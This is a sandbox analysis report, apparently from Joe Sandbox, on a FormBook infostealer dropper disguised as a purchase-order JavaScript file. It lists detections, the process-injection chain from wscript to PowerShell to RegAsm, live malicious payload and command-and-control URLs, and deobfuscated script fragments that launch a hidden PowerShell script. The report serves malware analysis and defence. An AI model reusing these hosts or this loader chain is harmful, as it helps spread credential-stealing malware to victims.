Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO from tpc Type 34.1 34,2 35 Spec 1.js

Overview

General Information

Sample name:PO from tpc Type 34.1 34,2 35 Spec 1.js
Analysis ID:1617723
MD5:2a7e82cc027e7b65b81697e2bdc0745f
SHA1:f5556a2bdb0f299ab6accae09099a9594b90bc44
SHA256:bef6a1f25411ce6839207cdd9c2c363c4395d8a096fda2c8ec45c5b8282b552f
Tags:jsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Potential obfuscated javascript found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5980 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6440 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • x.exe (PID: 6744 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: EED510D5B377CDBD8BCE6F25AD5E7EF9)
        • RegAsm.exe (PID: 2912 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
          • tgV1MsdzZ4.exe (PID: 2848 cmdline: "C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\AMZTwEptm8O.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
            • runonce.exe (PID: 5140 cmdline: "C:\Windows\SysWOW64\runonce.exe" MD5: 9E16655119DDE1B24A741C4FD4AD08FC)
              • tgV1MsdzZ4.exe (PID: 3840 cmdline: "C:\Program Files (x86)\VPoARwUDlDJNPHfaRPOcTUIIwNbkQMarCpzfJZOiCGVzYGBHTpUCLhBHerOycEEtwB\tgV1MsdzZ4.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • firefox.exe (PID: 4620 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3423391595.0000000000AC0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3424044771.0000000000DB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3424239645.0000000002F10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.2774125614.0000000005670000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3426268261.0000000004CA0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              7.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Script Initiated Connection to Non-Local Network
                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 196.251.92.64, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5980, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49741
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js", CommandLine|base64offset|contains: ~&, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js", ProcessId: 5980, ProcessName: wscript.exe
                Sigma detected: Script Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 196.251.92.64, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5980, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49741
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js", CommandLine|base64offset|contains: ~&, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js", ProcessId: 5980, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO from tpc Type 34.1 34,2 35 Spec 1.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 5980, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1", ProcessId: 6440, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T08:07:30.086551+010020188561A Network Trojan was detected196.251.92.6480192.168.2.649741TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T08:08:35.325044+010028554651A Network Trojan was detected192.168.2.649984162.218.30.23580TCP
                2025-02-18T08:08:59.048243+010028554651A Network Trojan was detected192.168.2.649988103.106.67.11280TCP
                2025-02-18T08:09:13.668214+010028554651A Network Trojan was detected192.168.2.649993104.21.16.180TCP
                2025-02-18T08:09:27.322437+010028554651A Network Trojan was detected192.168.2.649997104.21.112.180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-02-18T08:08:51.405926+010028554641A Network Trojan was detected192.168.2.649985103.106.67.11280TCP
                2025-02-18T08:08:53.945570+010028554641A Network Trojan was detected192.168.2.649986103.106.67.11280TCP
                2025-02-18T08:08:56.530116+010028554641A Network Trojan was detected192.168.2.649987103.106.67.11280TCP
                2025-02-18T08:09:05.850304+010028554641A Network Trojan was detected192.168.2.649990104.21.16.180TCP
                2025-02-18T08:09:09.201915+010028554641A Network Trojan was detected192.168.2.649991104.21.16.180TCP
                2025-02-18T08:09:10.958541+010028554641A Network Trojan was detected192.168.2.649992104.21.16.180TCP
                2025-02-18T08:09:19.479356+010028554641A Network Trojan was detected192.168.2.649994104.21.112.180TCP
                2025-02-18T08:09:22.016544+010028554641A Network Trojan was detected192.168.2.649995104.21.112.180TCP
                2025-02-18T08:09:24.762614+010028554641A Network Trojan was detected192.168.2.649996104.21.112.180TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://196.251.92.64/crypt/laser.ps1Avira URL Cloud: Label: malware
                Source: http://www.lucynoel6465.shop/jgkl/?cf2hYv=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpa+lylzXZBDngtVYDkWplwhs1JNVM9/WuG0QosQeZid/o9jeqLeg=&WHYh=mJr4VrfpGDBpAvira URL Cloud: Label: malware
                Source: http://www.l63339.xyz/vhr7/?cf2hYv=iaSfD1StI7hDT4qIAMii2AJAHOe0qHDn7gYmLjmbAGxKTACTDmsoqhtbBCAt1Ym3ncJClzXtgr7Snspij9c4s0uX0JFKsYq7jFvEkjnfDBmxL2FKNTn2vhsZCjIw0EPfzx7R5kM=&WHYh=mJr4VrfpGDBpAvira URL Cloud: Label: malware
                Source: http://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyaJnRUVMUOnSQnGJ4mxt7QzE7wP7HHXABn4vnPr4KbIzP7onr4No6wwmVIVHMDZ1g/WEU5TU=&WHYh=mJr4VrfpGDBpAvira URL Cloud: Label: malware
                Source: http://www.tumbetgirislinki.fit/k566/?WHYh=mJr4VrfpGDBp&cf2hYv=RARW43WNMKajmHoYlEtIRJLMiezSzeuXvXreCHJ6fEp5jkldk9mcWmm/U2k918FOdcoJ/x5nnQwLxIae2MHe+MwTnQBeuAzsSoj839zvz1sEY8eOyaRRELHSv6n+5nuEPWCNCpw=Avira URL Cloud: Label: malware
                Source: https://www.seasay.xyz/c9ts/?cf2hYv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExAyAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 62%
                Multi AV Scanner detection for submitted file
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsVirustotal: Detection: 16%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3423391595.0000000000AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424044771.0000000000DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3424239645.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2774125614.0000000005670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3426268261.0000000004CA0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2768044762.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2770300922.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZXGZX.pdbBSJB source: powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmp, x.exe.3.dr
                Source: Binary string: runonce.pdbGCTL source: tgV1MsdzZ4.exe, 00000009.00000002.3425165000.00000000008AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000007.00000002.2771061270.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2771057984.00000000049ED000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2768313392.000000000483C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000007.00000002.2771061270.0000000002B20000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, runonce.exe, 0000000A.00000003.2771057984.00000000049ED000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004D3E000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000002.3427632799.0000000004BA0000.00000040.00001000.00020000.00000000.sdmp, runonce.exe, 0000000A.00000003.2768313392.000000000483C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: runonce.pdb source: tgV1MsdzZ4.exe, 00000009.00000002.3425165000.00000000008AE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\VICTOR\Documents\CryptoObfuscator_Output\CZXGZX.pdb source: powershell.exe, 00000003.00000002.2335684319.0000026F90079000.00000004.00000800.00020000.00000000.sdmp, x.exe.3.dr
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tgV1MsdzZ4.exe, 00000009.00000002.3423549086.000000000006F000.00000002.00000001.01000000.0000000A.sdmp, tgV1MsdzZ4.exe, 0000000B.00000002.3423390541.000000000006F000.00000002.00000001.01000000.0000000A.sdmp
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 10_2_00ADC8D0 FindFirstFileW,FindNextFileW,FindClose,10_2_00ADC8D0

                Software Vulnerabilities

                barindex
                JavaScript source code contains functionality to generate code involving a shell, file or stream
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '"Scripting.FileSystemObject"', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsArgument value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
                Source: PO from tpc Type 34.1 34,2 35 Spec 1.jsReturn value : ['rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINd', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\\Temp\\dddddd.ps1"",0,true', '"WScript.Shell"', '1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omk', '"Scripting.FileSystemObject"', 'WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5WQNcJmkY', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "', '"PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ","Ui[L"', 'pSk0WOW,rwnOBW,1491308fcGHDY,t3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoG', 't3bLBG,WRlcQ8k6W7xdJHpcPsxcUcNdMXeWWOJcI8k0WR4lWQpdL3GgbmodgqangCoqBCoGW6pdLINdP30,omkwWRVcISkCWOO5W']Go to definition
